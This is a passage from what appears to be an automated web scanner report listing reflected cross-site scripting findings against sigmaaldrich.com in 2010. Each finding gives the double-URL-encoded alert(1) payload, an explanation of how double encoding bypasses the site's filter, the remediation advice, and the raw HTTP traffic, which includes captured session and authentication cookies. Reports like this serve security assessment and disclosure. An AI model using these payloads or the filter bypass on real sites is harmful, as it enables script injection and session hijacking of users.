bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:57 GMT
Content-Length: 29001
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interestb90ad";alert(1)//854402a9ab3/analytical-chromatography/fluka-analytical/customware-oem","E404") ;
   </script>
...[SNIP]...

1.85. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36c27%2522%253balert%25281%2529%252f%252f7975ddc7b5f was submitted in the REST URL parameter 4. This input was echoed as 36c27";alert(1)//7975ddc7b5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/analytical-chromatography36c27%2522%253balert%25281%2529%252f%252f7975ddc7b5f/fluka-analytical/customware-oem HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:58 GMT
Content-Length: 29001
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/analytical-chromatography36c27";alert(1)//7975ddc7b5f/fluka-analytical/customware-oem","E404") ;
   </script>
...[SNIP]...

1.86. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae422%2522%253balert%25281%2529%252f%252fbd23f0de004 was submitted in the REST URL parameter 5. This input was echoed as ae422";alert(1)//bd23f0de004 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analyticalae422%2522%253balert%25281%2529%252f%252fbd23f0de004/customware-oem HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:01 GMT
Content-Length: 29001
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analyticalae422";alert(1)//bd23f0de004/customware-oem","E404") ;
   </script>
...[SNIP]...

1.87. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12939%2522%253balert%25281%2529%252f%252f16e13dff68c was submitted in the REST URL parameter 6. This input was echoed as 12939";alert(1)//16e13dff68c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem12939%2522%253balert%25281%2529%252f%252f16e13dff68c HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:02 GMT
Content-Length: 29001
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem12939";alert(1)//16e13dff68c","E404") ;
   </script>
...[SNIP]...

1.88. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54859%2522%253balert%25281%2529%252f%252ff7b186b0cc9 was submitted in the REST URL parameter 1. This input was echoed as 54859";alert(1)//f7b186b0cc9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content54859%2522%253balert%25281%2529%252f%252ff7b186b0cc9/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:03 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content54859";alert(1)//f7b186b0cc9/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog","E404") ;
   </script>
...[SNIP]...

1.89. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b749e%2522%253balert%25281%2529%252f%252f222bd087545 was submitted in the REST URL parameter 2. This input was echoed as b749e";alert(1)//222bd087545 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichb749e%2522%253balert%25281%2529%252f%252f222bd087545/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:06 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichb749e";alert(1)//222bd087545/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog","E404") ;
   </script>
...[SNIP]...

1.90. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79af7%2522%253balert%25281%2529%252f%252f5a3e73ff3ff was submitted in the REST URL parameter 3. This input was echoed as 79af7";alert(1)//5a3e73ff3ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest79af7%2522%253balert%25281%2529%252f%252f5a3e73ff3ff/chemistry/chemical-synthesis/chemical-synthesis-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:08 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest79af7";alert(1)//5a3e73ff3ff/chemistry/chemical-synthesis/chemical-synthesis-catalog","E404") ;
   </script>
...[SNIP]...

1.91. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 458ee%2522%253balert%25281%2529%252f%252fb83b48b40d0 was submitted in the REST URL parameter 4. This input was echoed as 458ee";alert(1)//b83b48b40d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/chemistry458ee%2522%253balert%25281%2529%252f%252fb83b48b40d0/chemical-synthesis/chemical-synthesis-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:16 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/chemistry458ee";alert(1)//b83b48b40d0/chemical-synthesis/chemical-synthesis-catalog","E404") ;
   </script>
...[SNIP]...

1.92. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 228fc%2522%253balert%25281%2529%252f%252f2869de04022 was submitted in the REST URL parameter 5. This input was echoed as 228fc";alert(1)//2869de04022 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis228fc%2522%253balert%25281%2529%252f%252f2869de04022/chemical-synthesis-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:18 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis228fc";alert(1)//2869de04022/chemical-synthesis-catalog","E404") ;
   </script>
...[SNIP]...

1.93. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog

Issue detail

